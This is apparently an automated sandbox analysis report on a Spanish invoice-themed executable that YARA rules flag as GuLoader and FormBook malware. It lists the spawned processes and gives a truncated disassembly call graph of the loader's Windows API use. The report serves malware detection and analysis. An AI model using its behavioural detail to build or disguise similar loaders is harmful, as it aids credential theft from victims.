                                                Jan 15, 2025 18:20:58.186067104 CET1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item" href="footer3-bg-img.html">Footer 3 Transparent</a></li>


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:12:18:24
                                                Start date:15/01/2025
                                                Path:C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"
                                                Imagebase:0x400000
                                                File size:578'322 bytes
                                                MD5 hash:66D651E5546DEDAFD0A252400B70C21D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000000.00000002.84200771924.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000000.00000003.83100054536.00000000029FF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.84200771924.0000000008C45000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:2
                                                Start time:12:20:14
                                                Start date:15/01/2025
                                                Path:C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"
                                                Imagebase:0x400000
                                                File size:578'322 bytes
                                                MD5 hash:66D651E5546DEDAFD0A252400B70C21D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.84398186443.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.84425926740.0000000036460000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:3
                                                Start time:12:20:27
                                                Start date:15/01/2025
                                                Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                                Imagebase:0x140000000
                                                File size:16'696'840 bytes
                                                MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:false

                                                General

                                                Target ID:4
                                                Start time:12:20:28
                                                Start date:15/01/2025
                                                Path:C:\Windows\SysWOW64\rasphone.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\SysWOW64\rasphone.exe"
                                                Imagebase:0x160000
                                                File size:31'744 bytes
                                                MD5 hash:B5D49238841360E079DA1EC4627684EA
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.84737968184.0000000004730000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.84737857706.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:moderate
                                                Has exited:true

                                                General

                                                Target ID:6
                                                Start time:12:21:03
                                                Start date:15/01/2025
                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                Wow64 process (32bit):
                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                Imagebase:
                                                File size:597'432 bytes
                                                MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:false

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:20.6%
                                                  Dynamic/Decrypted Code Coverage:13.5%
                                                  Signature Coverage:16.7%
                                                  Total number of Nodes:1603
                                                  Total number of Limit Nodes:43
                                                  execution_graph 4221 401bc0 4222 401c11 4221->4222 4228 401bcd 4221->4228 4223 401c16 4222->4223 4224 401c3b GlobalAlloc 4222->4224 4234 401c56 4223->4234 4259 406541 lstrcpynW 4223->4259 4240 40657e 4224->4240 4225 4023af 4227 40657e 21 API calls 4225->4227 4230 4023bc 4227->4230 4228->4225 4231 401be4 4228->4231 4230->4234 4260 405ba1 4230->4260 4257 406541 lstrcpynW 4231->4257 4232 401c28 GlobalFree 4232->4234 4236 401bf3 4258 406541 lstrcpynW 4236->4258 4238 401c02 4264 406541 lstrcpynW 4238->4264 4255 406589 4240->4255 4241 4067d0 4242 4067e9 4241->4242 4287 406541 lstrcpynW 4241->4287 4242->4234 4244 4067a1 lstrlenW 4244->4255 4246 40669a GetSystemDirectoryW 4246->4255 4247 40657e 15 API calls 4247->4244 4250 4066b0 GetWindowsDirectoryW 4250->4255 4251 40657e 15 API calls 4251->4255 4252 406742 lstrcatW 4252->4255 4255->4241 4255->4244 4255->4246 4255->4247 4255->4250 4255->4251 4255->4252 4256 406712 SHGetPathFromIDListW CoTaskMemFree 4255->4256 4265 406935 GetModuleHandleA 4255->4265 4271 40640f 4255->4271 4276 4067ef 4255->4276 4285 406488 wsprintfW 4255->4285 4286 406541 lstrcpynW 4255->4286 4256->4255 4257->4236 4258->4238 4259->4232 4261 405bb6 4260->4261 4262 405c02 4261->4262 4263 405bca MessageBoxIndirectW 4261->4263 4262->4234 4263->4262 4264->4234 4266 406951 4265->4266 4267 40695b GetProcAddress 4265->4267 4288 4068c5 GetSystemDirectoryW 4266->4288 4269 40696a 4267->4269 4269->4255 4270 406957 4270->4267 4270->4269 4291 4063ae 4271->4291 4274 406443 RegQueryValueExW RegCloseKey 4275 406473 4274->4275 4275->4255 4283 4067fc 4276->4283 4277 406872 4278 406877 CharPrevW 4277->4278 4280 406898 4277->4280 4278->4277 4279 406865 CharNextW 4279->4277 4279->4283 4280->4255 4282 406851 CharNextW 4282->4283 4283->4277 4283->4279 4283->4282 4284 406860 CharNextW 4283->4284 4295 405e3d 4283->4295 4284->4279 4285->4255 4286->4255 4287->4242 4289 4068e7 wsprintfW LoadLibraryExW 4288->4289 4289->4270 4292 4063bd 4291->4292 4293 4063c6 RegOpenKeyExW 4292->4293 4294 4063c1 4292->4294 4293->4294 4294->4274 4294->4275 4296 405e43 4295->4296 4297 405e59 4296->4297 4298 405e4a CharNextW 4296->4298 4297->4283 4298->4296 4299 707e2a7f 4300 707e2acf 4299->4300 4301 707e2a8f VirtualProtect 4299->4301 4301->4300 4302 403fc1 4303 403fd9 4302->4303 4304 40413a 4302->4304 4303->4304 4305 403fe5 4303->4305 4306 40418b 4304->4306 4307 40414b GetDlgItem GetDlgItem 4304->4307 4308 403ff0 SetWindowPos 4305->4308 4309 404003 4305->4309 4311 4041e5 4306->4311 4322 401389 2 API calls 4306->4322 4310 4044c0 22 API calls 4307->4310 4308->4309 4313 40400c ShowWindow 4309->4313 4314 40404e 4309->4314 4315 404175 SetClassLongW 4310->4315 4316 404135 4311->4316 4375 40450c 4311->4375 4317 404127 4313->4317 4318 40402c GetWindowLongW 4313->4318 4319 404056 DestroyWindow 4314->4319 4320 40406d 4314->4320 4321 40140b 2 API calls 4315->4321 4397 404527 4317->4397 4318->4317 4324 404045 ShowWindow 4318->4324 4325 404449 4319->4325 4326 404072 SetWindowLongW 4320->4326 4327 404083 4320->4327 4321->4306 4328 4041bd 4322->4328 4324->4314 4325->4316 4333 40447a ShowWindow 4325->4333 4326->4316 4327->4317 4331 40408f GetDlgItem 4327->4331 4328->4311 4332 4041c1 SendMessageW 4328->4332 4329 40140b 2 API calls 4344 4041f7 4329->4344 4330 40444b DestroyWindow EndDialog 4330->4325 4334 4040a0 SendMessageW IsWindowEnabled 4331->4334 4335 4040bd 4331->4335 4332->4316 4333->4316 4334->4316 4334->4335 4337 4040ca 4335->4337 4338 404111 SendMessageW 4335->4338 4339 4040dd 4335->4339 4348 4040c2 4335->4348 4336 40657e 21 API calls 4336->4344 4337->4338 4337->4348 4338->4317 4341 4040e5 4339->4341 4342 4040fa 4339->4342 4391 40140b 4341->4391 4346 40140b 2 API calls 4342->4346 4343 4040f8 4343->4317 4344->4316 4344->4329 4344->4330 4344->4336 4347 4044c0 22 API calls 4344->4347 4366 40438b DestroyWindow 4344->4366 4378 4044c0 4344->4378 4349 404101 4346->4349 4347->4344 4394 404499 4348->4394 4349->4317 4349->4348 4351 404272 GetDlgItem 4352 404287 4351->4352 4353 40428f ShowWindow KiUserCallbackDispatcher 4351->4353 4352->4353 4381 4044e2 KiUserCallbackDispatcher 4353->4381 4355 4042b9 EnableWindow 4360 4042cd 4355->4360 4356 4042d2 GetSystemMenu EnableMenuItem SendMessageW 4357 404302 SendMessageW 4356->4357 4356->4360 4357->4360 4360->4356 4382 4044f5 SendMessageW 4360->4382 4383 403fa2 4360->4383 4386 406541 lstrcpynW 4360->4386 4362 404331 lstrlenW 4363 40657e 21 API calls 4362->4363 4364 404347 SetWindowTextW 4363->4364 4387 401389 4364->4387 4366->4325 4367 4043a5 CreateDialogParamW 4366->4367 4367->4325 4368 4043d8 4367->4368 4369 4044c0 22 API calls 4368->4369 4370 4043e3 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4369->4370 4371 401389 2 API calls 4370->4371 4372 404429 4371->4372 4372->4316 4373 404431 ShowWindow 4372->4373 4374 40450c SendMessageW 4373->4374 4374->4325 4376 404524 4375->4376 4377 404515 SendMessageW 4375->4377 4376->4344 4377->4376 4379 40657e 21 API calls 4378->4379 4380 4044cb SetDlgItemTextW 4379->4380 4380->4351 4381->4355 4382->4360 4384 40657e 21 API calls 4383->4384 4385 403fb0 SetWindowTextW 4384->4385 4385->4360 4386->4362 4389 401390 4387->4389 4388 4013fe 4388->4344 4389->4388 4390 4013cb MulDiv SendMessageW 4389->4390 4390->4389 4392 401389 2 API calls 4391->4392 4393 401420 4392->4393 4393->4348 4395 4044a0 4394->4395 4396 4044a6 SendMessageW 4394->4396 4395->4396 4396->4343 4398 4045ea 4397->4398 4399 40453f GetWindowLongW 4397->4399 4398->4316 4399->4398 4400 404554 4399->4400 4400->4398 4401 404581 GetSysColor 4400->4401 4402 404584 4400->4402 4401->4402 4403 404594 SetBkMode 4402->4403 4404 40458a SetTextColor 4402->4404 4405 4045b2 4403->4405 4406 4045ac GetSysColor 4403->4406 4404->4403 4407 4045c3 4405->4407 4408 4045b9 SetBkColor 4405->4408 4406->4405 4407->4398 4409 4045d6 DeleteObject 4407->4409 4410 4045dd CreateBrushIndirect 4407->4410 4408->4407 4409->4410 4410->4398 5330 402641 5331 402dcb 21 API calls 5330->5331 5332 402648 5331->5332 5335 406031 GetFileAttributesW CreateFileW 5332->5335 5334 402654 5335->5334 5343 4025c3 5344 402e0b 21 API calls 5343->5344 5345 4025cd 5344->5345 5346 402da9 21 API calls 5345->5346 5347 4025d6 5346->5347 5348 4025f2 RegEnumKeyW 5347->5348 5349 4025fe RegEnumValueW 5347->5349 5351 402953 5347->5351 5350 402613 RegCloseKey 5348->5350 5349->5350 5350->5351 5353 707e1979 5355 707e199c 5353->5355 5354 707e19e3 5357 707e1312 2 API calls 5354->5357 5355->5354 5356 707e19d1 GlobalFree 5355->5356 5356->5354 5358 707e1b6e GlobalFree GlobalFree 5357->5358 5359 4015c8 5360 402dcb 21 API calls 5359->5360 5361 4015cf SetFileAttributesW 5360->5361 5362 4015e1 5361->5362 4668 401fc9 4669 402dcb 21 API calls 4668->4669 4670 401fcf 4669->4670 4671 4055c6 28 API calls 4670->4671 4672 401fd9 4671->4672 4683 405b24 CreateProcessW 4672->4683 4675 402002 CloseHandle 4679 402953 4675->4679 4678 401ff4 4680 402004 4678->4680 4681 401ff9 4678->4681 4680->4675 4691 406488 wsprintfW 4681->4691 4684 401fdf 4683->4684 4685 405b57 CloseHandle 4683->4685 4684->4675 4684->4679 4686 4069e0 WaitForSingleObject 4684->4686 4685->4684 4687 4069fa 4686->4687 4688 406a0c GetExitCodeProcess 4687->4688 4692 406971 4687->4692 4688->4678 4691->4675 4693 40698e PeekMessageW 4692->4693 4694 406984 DispatchMessageW 4693->4694 4695 40699e WaitForSingleObject 4693->4695 4694->4693 4695->4687 5363 707e1774 5364 707e17a3 5363->5364 5365 707e1bff 22 API calls 5364->5365 5366 707e17aa 5365->5366 5367 707e17bd 5366->5367 5368 707e17b1 5366->5368 5369 707e17c7 5367->5369 5370 707e17e4 5367->5370 5371 707e1312 2 API calls 5368->5371 5372 707e15dd 3 API calls 5369->5372 5373 707e180e 5370->5373 5374 707e17ea 5370->5374 5375 707e17bb 5371->5375 5377 707e17cc 5372->5377 5376 707e15dd 3 API calls 5373->5376 5378 707e1654 3 API calls 5374->5378 5376->5375 5379 707e1654 3 API calls 5377->5379 5380 707e17ef 5378->5380 5381 707e17d2 5379->5381 5382 707e1312 2 API calls 5380->5382 5383 707e1312 2 API calls 5381->5383 5384 707e17f5 GlobalFree 5382->5384 5385 707e17d8 GlobalFree 5383->5385 5384->5375 5386 707e1809 GlobalFree 5384->5386 5385->5375 5386->5375 4696 40254f 4707 402e0b 4696->4707 4699 402dcb 21 API calls 4700 402562 4699->4700 4701 40256d RegQueryValueExW 4700->4701 4705 402953 4700->4705 4702 402593 RegCloseKey 4701->4702 4703 40258d 4701->4703 4702->4705 4703->4702 4712 406488 wsprintfW 4703->4712 4708 402dcb 21 API calls 4707->4708 4709 402e22 4708->4709 4710 4063ae RegOpenKeyExW 4709->4710 4711 402559 4710->4711 4711->4699 4712->4702 4713 4021cf 4714 402dcb 21 API calls 4713->4714 4715 4021d6 4714->4715 4716 402dcb 21 API calls 4715->4716 4717 4021e0 4716->4717 4718 402dcb 21 API calls 4717->4718 4719 4021ea 4718->4719 4720 402dcb 21 API calls 4719->4720 4721 4021f4 4720->4721 4722 402dcb 21 API calls 4721->4722 4723 4021fe 4722->4723 4724 40223d CoCreateInstance 4723->4724 4725 402dcb 21 API calls 4723->4725 4726 40225c 4724->4726 4725->4724 4727 401423 28 API calls 4726->4727 4728 40231b 4726->4728 4727->4728 5390 40204f 5391 402dcb 21 API calls 5390->5391 5392 402056 5391->5392 5393 406935 5 API calls 5392->5393 5394 402065 5393->5394 5395 402081 GlobalAlloc 5394->5395 5396 4020f1 5394->5396 5395->5396 5397 402095 5395->5397 5398 406935 5 API calls 5397->5398 5399 40209c 5398->5399 5400 406935 5 API calls 5399->5400 5401 4020a6 5400->5401 5401->5396 5405 406488 wsprintfW 5401->5405 5403 4020df 5406 406488 wsprintfW 5403->5406 5405->5403 5406->5396 5407 403bd1 5408 403bdc 5407->5408 5409 403be3 GlobalAlloc 5408->5409 5410 403be0 5408->5410 5409->5410 5418 401a55 5419 402dcb 21 API calls 5418->5419 5420 401a5e ExpandEnvironmentStringsW 5419->5420 5421 401a72 5420->5421 5423 401a85 5420->5423 5422 401a77 lstrcmpW 5421->5422 5421->5423 5422->5423 5424 4014d7 5425 402da9 21 API calls 5424->5425 5426 4014dd Sleep 5425->5426 5428 402c4f 5426->5428 5434 4023d7 5435 4023e5 5434->5435 5436 4023df 5434->5436 5438 4023f3 5435->5438 5440 402dcb 21 API calls 5435->5440 5437 402dcb 21 API calls 5436->5437 5437->5435 5439 402401 5438->5439 5441 402dcb 21 API calls 5438->5441 5442 402dcb 21 API calls 5439->5442 5440->5438 5441->5439 5443 40240a WritePrivateProfileStringW 5442->5443 5444 707e23e9 5445 707e2453 5444->5445 5446 707e245e GlobalAlloc 5445->5446 5447 707e247d 5445->5447 5446->5445 4871 402459 4872 402461 4871->4872 4873 40248c 4871->4873 4874 402e0b 21 API calls 4872->4874 4875 402dcb 21 API calls 4873->4875 4876 402468 4874->4876 4877 402493 4875->4877 4878 402472 4876->4878 4881 4024a0 4876->4881 4883 402e89 4877->4883 4880 402dcb 21 API calls 4878->4880 4882 402479 RegDeleteValueW RegCloseKey 4880->4882 4882->4881 4884 402e96 4883->4884 4885 402e9d 4883->4885 4884->4881 4885->4884 4887 402ece 4885->4887 4888 4063ae RegOpenKeyExW 4887->4888 4889 402efc 4888->4889 4890 402fb1 4889->4890 4891 402f06 4889->4891 4890->4884 4892 402f0c RegEnumValueW 4891->4892 4893 402f2f 4891->4893 4892->4893 4894 402f96 RegCloseKey 4892->4894 4893->4894 4895 402f6b RegEnumKeyW 4893->4895 4896 402f74 RegCloseKey 4893->4896 4899 402ece 6 API calls 4893->4899 4894->4890 4895->4893 4895->4896 4897 406935 5 API calls 4896->4897 4898 402f84 4897->4898 4900 402fa6 4898->4900 4901 402f88 RegDeleteKeyW 4898->4901 4899->4893 4900->4890 4901->4890 5448 40175a 5449 402dcb 21 API calls 5448->5449 5450 401761 SearchPathW 5449->5450 5451 40177c 5450->5451 5452 401d5d 5453 402da9 21 API calls 5452->5453 5454 401d64 5453->5454 5455 402da9 21 API calls 5454->5455 5456 401d70 GetDlgItem 5455->5456 5457 40265d 5456->5457 5458 406c5f 5459 406ae3 5458->5459 5460 40744e 5459->5460 5461 406b64 GlobalFree 5459->5461 5462 406b6d GlobalAlloc 5459->5462 5463 406be4 GlobalAlloc 5459->5463 5464 406bdb GlobalFree 5459->5464 5461->5462 5462->5459 5462->5460 5463->5459 5463->5460 5464->5463 5465 707e10e1 5472 707e1111 5465->5472 5466 707e12b0 GlobalFree 5467 707e1240 GlobalFree 5467->5472 5468 707e11d7 GlobalAlloc 5468->5472 5469 707e12ab 5469->5466 5470 707e135a 2 API calls 5470->5472 5471 707e129a GlobalFree 5471->5472 5472->5466 5472->5467 5472->5468 5472->5469 5472->5470 5472->5471 5473 707e1312 2 API calls 5472->5473 5474 707e116b GlobalAlloc 5472->5474 5475 707e1381 lstrcpyW 5472->5475 5473->5472 5474->5472 5475->5472 5476 402663 5477 402692 5476->5477 5478 402677 5476->5478 5479 4026c2 5477->5479 5480 402697 5477->5480 5481 402da9 21 API calls 5478->5481 5483 402dcb 21 API calls 5479->5483 5482 402dcb 21 API calls 5480->5482 5488 40267e 5481->5488 5484 40269e 5482->5484 5485 4026c9 lstrlenW 5483->5485 5493 406563 WideCharToMultiByte 5484->5493 5485->5488 5487 4026b2 lstrlenA 5487->5488 5489 40270c 5488->5489 5490 4026f6 5488->5490 5492 406112 5 API calls 5488->5492 5490->5489 5491 4060e3 WriteFile 5490->5491 5491->5489 5492->5490 5493->5487 4505 401966 4506 401968 4505->4506 4507 402dcb 21 API calls 4506->4507 4508 40196d 4507->4508 4511 405c4d 4508->4511 4550 405f18 4511->4550 4514 405c75 DeleteFileW 4516 401976 4514->4516 4515 405c8c 4517 405db7 4515->4517 4564 406541 lstrcpynW 4515->4564 4517->4516 4582 40689e FindFirstFileW 4517->4582 4519 405cb2 4520 405cc5 4519->4520 4521 405cb8 lstrcatW 4519->4521 4565 405e5c lstrlenW 4520->4565 4522 405ccb 4521->4522 4525 405cdb lstrcatW 4522->4525 4527 405ce6 lstrlenW FindFirstFileW 4522->4527 4525->4527 4529 405dac 4527->4529 4548 405d08 4527->4548 4528 405dd5 4585 405e10 lstrlenW CharPrevW 4528->4585 4529->4517 4533 405d8f FindNextFileW 4536 405da5 FindClose 4533->4536 4533->4548 4534 405c05 5 API calls 4535 405de7 4534->4535 4537 405e01 4535->4537 4538 405deb 4535->4538 4536->4529 4540 4055c6 28 API calls 4537->4540 4538->4516 4541 4055c6 28 API calls 4538->4541 4540->4516 4543 405df8 4541->4543 4542 405c4d 64 API calls 4542->4548 4545 406301 40 API calls 4543->4545 4544 4055c6 28 API calls 4544->4533 4546 405dff 4545->4546 4546->4516 4547 4055c6 28 API calls 4547->4548 4548->4533 4548->4542 4548->4544 4548->4547 4569 406541 lstrcpynW 4548->4569 4570 405c05 4548->4570 4578 406301 MoveFileExW 4548->4578 4588 406541 lstrcpynW 4550->4588 4552 405f29 4589 405ebb CharNextW CharNextW 4552->4589 4555 405c6d 4555->4514 4555->4515 4556 4067ef 5 API calls 4562 405f3f 4556->4562 4557 405f70 lstrlenW 4558 405f7b 4557->4558 4557->4562 4560 405e10 3 API calls 4558->4560 4559 40689e 2 API calls 4559->4562 4561 405f80 GetFileAttributesW 4560->4561 4561->4555 4562->4555 4562->4557 4562->4559 4563 405e5c 2 API calls 4562->4563 4563->4557 4564->4519 4566 405e6a 4565->4566 4567 405e70 CharPrevW 4566->4567 4568 405e7c 4566->4568 4567->4566 4567->4568 4568->4522 4569->4548 4595 40600c GetFileAttributesW 4570->4595 4573 405c32 4573->4548 4574 405c20 RemoveDirectoryW 4576 405c2e 4574->4576 4575 405c28 DeleteFileW 4575->4576 4576->4573 4577 405c3e SetFileAttributesW 4576->4577 4577->4573 4579 406322 4578->4579 4580 406315 4578->4580 4579->4548 4598 406187 4580->4598 4583 4068b4 FindClose 4582->4583 4584 405dd1 4582->4584 4583->4584 4584->4516 4584->4528 4586 405ddb 4585->4586 4587 405e2c lstrcatW 4585->4587 4586->4534 4587->4586 4588->4552 4590 405ed8 4589->4590 4593 405eea 4589->4593 4592 405ee5 CharNextW 4590->4592 4590->4593 4591 405f0e 4591->4555 4591->4556 4592->4591 4593->4591 4594 405e3d CharNextW 4593->4594 4594->4593 4596 405c11 4595->4596 4597 40601e SetFileAttributesW 4595->4597 4596->4573 4596->4574 4596->4575 4597->4596 4599 4061b7 4598->4599 4600 4061dd GetShortPathNameW 4598->4600 4625 406031 GetFileAttributesW CreateFileW 4599->4625 4602 4061f2 4600->4602 4603 4062fc 4600->4603 4602->4603 4604 4061fa wsprintfA 4602->4604 4603->4579 4606 40657e 21 API calls 4604->4606 4605 4061c1 CloseHandle GetShortPathNameW 4605->4603 4607 4061d5 4605->4607 4608 406222 4606->4608 4607->4600 4607->4603 4626 406031 GetFileAttributesW CreateFileW 4608->4626 4610 40622f 4610->4603 4611 40623e GetFileSize GlobalAlloc 4610->4611 4612 406260 4611->4612 4613 4062f5 CloseHandle 4611->4613 4627 4060b4 ReadFile 4612->4627 4613->4603 4618 406293 4620 405f96 4 API calls 4618->4620 4619 40627f lstrcpyA 4621 4062a1 4619->4621 4620->4621 4622 4062d8 SetFilePointer 4621->4622 4634 4060e3 WriteFile 4622->4634 4625->4605 4626->4610 4628 4060d2 4627->4628 4628->4613 4629 405f96 lstrlenA 4628->4629 4630 405fd7 lstrlenA 4629->4630 4631 405fb0 lstrcmpiA 4630->4631 4632 405fdf 4630->4632 4631->4632 4633 405fce CharNextA 4631->4633 4632->4618 4632->4619 4633->4630 4635 406101 GlobalFree 4634->4635 4635->4613 4636 4015e6 4637 402dcb 21 API calls 4636->4637 4638 4015ed 4637->4638 4639 405ebb 4 API calls 4638->4639 4652 4015f6 4639->4652 4640 401656 4642 40165b 4640->4642 4644 401688 4640->4644 4641 405e3d CharNextW 4641->4652 4661 401423 4642->4661 4645 401423 28 API calls 4644->4645 4653 401680 4645->4653 4650 40166f SetCurrentDirectoryW 4650->4653 4651 40163c GetFileAttributesW 4651->4652 4652->4640 4652->4641 4652->4651 4655 405b0c 4652->4655 4658 405a95 CreateDirectoryW 4652->4658 4665 405aef CreateDirectoryW 4652->4665 4656 406935 5 API calls 4655->4656 4657 405b13 4656->4657 4657->4652 4659 405ae1 4658->4659 4660 405ae5 GetLastError 4658->4660 4659->4652 4660->4659 4662 4055c6 28 API calls 4661->4662 4663 401431 4662->4663 4664 406541 lstrcpynW 4663->4664 4664->4650 4666 405b03 GetLastError 4665->4666 4667 405aff 4665->4667 4666->4667 4667->4652 5494 707e1058 5496 707e1074 5494->5496 5495 707e10dd 5496->5495 5497 707e1092 5496->5497 5507 707e15b6 5496->5507 5499 707e15b6 GlobalFree 5497->5499 5500 707e10a2 5499->5500 5501 707e10a9 GlobalSize 5500->5501 5502 707e10b2 5500->5502 5501->5502 5503 707e10c7 5502->5503 5504 707e10b6 GlobalAlloc 5502->5504 5506 707e10d2 GlobalFree 5503->5506 5505 707e15dd 3 API calls 5504->5505 5505->5503 5506->5495 5509 707e15bc 5507->5509 5508 707e15c2 5508->5497 5509->5508 5510 707e15ce GlobalFree 5509->5510 5510->5497 5511 401c68 5512 402da9 21 API calls 5511->5512 5513 401c6f 5512->5513 5514 402da9 21 API calls 5513->5514 5515 401c7c 5514->5515 5516 401c91 5515->5516 5517 402dcb 21 API calls 5515->5517 5518 401ca1 5516->5518 5519 402dcb 21 API calls 5516->5519 5517->5516 5520 401cf8 5518->5520 5521 401cac 5518->5521 5519->5518 5522 402dcb 21 API calls 5520->5522 5523 402da9 21 API calls 5521->5523 5524 401cfd 5522->5524 5525 401cb1 5523->5525 5526 402dcb 21 API calls 5524->5526 5527 402da9 21 API calls 5525->5527 5528 401d06 FindWindowExW 5526->5528 5529 401cbd 5527->5529 5532 401d28 5528->5532 5530 401ce8 SendMessageW 5529->5530 5531 401cca SendMessageTimeoutW 5529->5531 5530->5532 5531->5532 5540 4028e9 5541 4028ef 5540->5541 5542 4028f7 FindClose 5541->5542 5543 402c4f 5541->5543 5542->5543 5544 40496a 5545 4049a0 5544->5545 5546 40497a 5544->5546 5548 404527 8 API calls 5545->5548 5547 4044c0 22 API calls 5546->5547 5550 404987 SetDlgItemTextW 5547->5550 5549 4049ac 5548->5549 5550->5545 5551 4016f1 5552 402dcb 21 API calls 5551->5552 5553 4016f7 GetFullPathNameW 5552->5553 5554 401733 5553->5554 5555 401711 5553->5555 5556 401748 GetShortPathNameW 5554->5556 5557 402c4f 5554->5557 5555->5554 5558 40689e 2 API calls 5555->5558 5556->5557 5559 401723 5558->5559 5559->5554 5561 406541 lstrcpynW 5559->5561 5561->5554 5562 401e73 GetDC 5563 402da9 21 API calls 5562->5563 5564 401e85 GetDeviceCaps MulDiv ReleaseDC 5563->5564 5565 402da9 21 API calls 5564->5565 5566 401eb6 5565->5566 5567 40657e 21 API calls 5566->5567 5568 401ef3 CreateFontIndirectW 5567->5568 5569 40265d 5568->5569 5570 402975 5571 402dcb 21 API calls 5570->5571 5572 402981 5571->5572 5573 402997 5572->5573 5575 402dcb 21 API calls 5572->5575 5574 40600c 2 API calls 5573->5574 5576 40299d 5574->5576 5575->5573 5598 406031 GetFileAttributesW CreateFileW 5576->5598 5578 4029aa 5579 402a60 5578->5579 5580 4029c5 GlobalAlloc 5578->5580 5581 402a48 5578->5581 5582 402a67 DeleteFileW 5579->5582 5583 402a7a 5579->5583 5580->5581 5584 4029de 5580->5584 5585 4032d9 39 API calls 5581->5585 5582->5583 5599 4034d4 SetFilePointer 5584->5599 5587 402a55 CloseHandle 5585->5587 5587->5579 5588 4029e4 5589 4034be ReadFile 5588->5589 5590 4029ed GlobalAlloc 5589->5590 5591 402a31 5590->5591 5592 4029fd 5590->5592 5593 4060e3 WriteFile 5591->5593 5594 4032d9 39 API calls 5592->5594 5595 402a3d GlobalFree 5593->5595 5597 402a0a 5594->5597 5595->5581 5596 402a28 GlobalFree 5596->5591 5597->5596 5598->5578 5599->5588 5600 4014f5 SetForegroundWindow 5601 402c4f 5600->5601 5602 4045f6 lstrcpynW lstrlenW 5603 40197b 5604 402dcb 21 API calls 5603->5604 5605 401982 lstrlenW 5604->5605 5606 40265d 5605->5606 5136 4020fd 5137 4021c1 5136->5137 5138 40210f 5136->5138 5140 401423 28 API calls 5137->5140 5139 402dcb 21 API calls 5138->5139 5141 402116 5139->5141 5147 40231b 5140->5147 5142 402dcb 21 API calls 5141->5142 5143 40211f 5142->5143 5144 402135 LoadLibraryExW 5143->5144 5145 402127 GetModuleHandleW 5143->5145 5144->5137 5146 402146 5144->5146 5145->5144 5145->5146 5159 4069a4 5146->5159 5150 402190 5152 4055c6 28 API calls 5150->5152 5151 402157 5153 402176 5151->5153 5154 40215f 5151->5154 5155 402167 5152->5155 5164 707e1817 5153->5164 5156 401423 28 API calls 5154->5156 5155->5147 5157 4021b3 FreeLibrary 5155->5157 5156->5155 5157->5147 5206 406563 WideCharToMultiByte 5159->5206 5161 4069c1 5162 4069c8 GetProcAddress 5161->5162 5163 402151 5161->5163 5162->5163 5163->5150 5163->5151 5165 707e184a 5164->5165 5207 707e1bff 5165->5207 5167 707e1851 5168 707e1976 5167->5168 5169 707e1869 5167->5169 5170 707e1862 5167->5170 5168->5155 5241 707e2480 5169->5241 5257 707e243e 5170->5257 5175 707e18af 5270 707e2655 5175->5270 5176 707e18cd 5179 707e191e 5176->5179 5180 707e18d3 5176->5180 5177 707e187f 5182 707e1885 5177->5182 5188 707e1890 5177->5188 5178 707e1898 5189 707e188e 5178->5189 5267 707e2e23 5178->5267 5186 707e2655 10 API calls 5179->5186 5289 707e1666 5180->5289 5182->5189 5251 707e2b98 5182->5251 5192 707e190f 5186->5192 5187 707e18b5 5281 707e1654 5187->5281 5261 707e2810 5188->5261 5189->5175 5189->5176 5198 707e1965 5192->5198 5295 707e2618 5192->5295 5194 